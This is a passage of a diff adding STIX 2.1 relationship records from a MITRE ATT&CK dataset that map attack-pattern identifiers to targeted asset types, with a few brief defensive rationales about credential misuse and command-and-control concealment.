"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--051730bf-8815-4f1a-be6c-4343c13daec5", + "created": "2024-06-26T14:23:35.312Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:23:35.312Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--05227ebc-bcea-42a8-b5f7-d6db5a97aa4c", + "created": "2024-06-26T13:53:12.726Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:53:12.726Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0536e9fb-2b02-43e4-b3e4-1191ed4b526d", + "created": "2020-10-23T15:04:40.254Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", + "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0550463b-4e46-4ea0-a7a2-c052bf0defcc", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0555d3df-0b53-426b-b11d-a4a0e6809534", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0556f157-9641-4e88-805f-76c082b2a693", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0583150b-f8da-44aa-bc1f-a7af3299cf4e", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--05d0c3fe-f210-4dd1-a082-45ac8f0c1c47", + "created": "2019-12-19T21:05:38.420Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--05d4a20d-0c9a-4b99-89c4-f76316f9d5c9", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--05e3980c-03ae-4624-82d8-0cbcc45705cd", + "created": "2020-01-31T12:35:36.758Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--05f06c9b-4895-4361-b334-eaec98e650ab", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--063ae779-7d42-4b27-b8d9-3f7985fba0e2", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--063bc871-a79d-475e-a6ad-b2365448a1a2", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--064381eb-d514-491e-a4be-3aa4209d38bd", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--064c636f-da39-42da-9cb7-00cc72978f2e", + "created": "2024-06-26T14:27:30.367Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:27:30.367Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--064f8984-e6cc-4334-a5ad-903a7af9bf4c", + "created": "2023-03-08T22:40:07.137Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:40:07.137Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0662c679-98cb-4f88-b064-9aa8c9c32f77", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--069d7933-c7ec-48ea-a22f-e3b1000a9cf7", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--071ba9cd-5fbe-4d13-8f03-1362d2719c86", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0725d8d8-7958-409c-aa18-75473378cd32", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07441d9c-e077-41a5-afab-3b945a3d611c", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--074b50fc-b202-4bd7-be8e-3dbf2f70b211", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0750563d-a86c-4822-ab9c-0f2d3c304c6e", + "created": "2023-09-28T21:28:51.104Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:28:51.104Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07683c47-4572-4579-93e7-ac83f2933ac2", + "created": "2020-01-14T17:19:51.120Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--076bfea6-309e-4804-a147-dffe93983481", + "created": "2023-09-28T20:16:17.295Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:16:17.295Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07706ff3-fe53-4c87-bef5-0d65345ac90c", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--077173d3-2357-4f81-888b-75f8ed5c88f8", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--079bbf9d-0282-41af-8eb6-a6d914303895", + "created": "2024-05-22T15:09:58.369Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T15:10:18.321Z", + "description": "Asset Mapping Rationale: Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and network devices.", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07abc331-1277-4866-8794-a842586d3f5e", + "created": "2024-05-23T04:05:52.586Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-23T19:56:25.826Z", + "description": "Asset Mapping Rationale: Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "relationship_type": "targets", + "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07ae5595-8337-4422-b883-9a4085c6a08e", + "created": "2024-05-23T04:08:36.321Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-23T20:37:56.927Z", + "description": "Asset Mapping Rationale: Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment .Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07ae74ec-4735-46bc-b729-85750a3fb024", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07b059bc-92fb-4cd1-8771-cee65a8eb935", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07b2fe93-afb8-4072-a54e-8280ef31eb3e", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07b421f9-e386-4696-b1c6-c7177ae8535d", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07c30163-691e-47fd-88b8-df8e53cbe5f6", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07c83090-13ca-4886-bd9e-4254a2e31c1a", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07e06d21-e666-4274-838a-ef9996fdc0cd", + "created": "2023-09-28T20:05:45.540Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:05:45.540Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--07f11dc3-60d7-42d3-a4f0-82eba85dfe44", + "created": "2023-09-29T16:47:20.192Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:47:20.192Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": 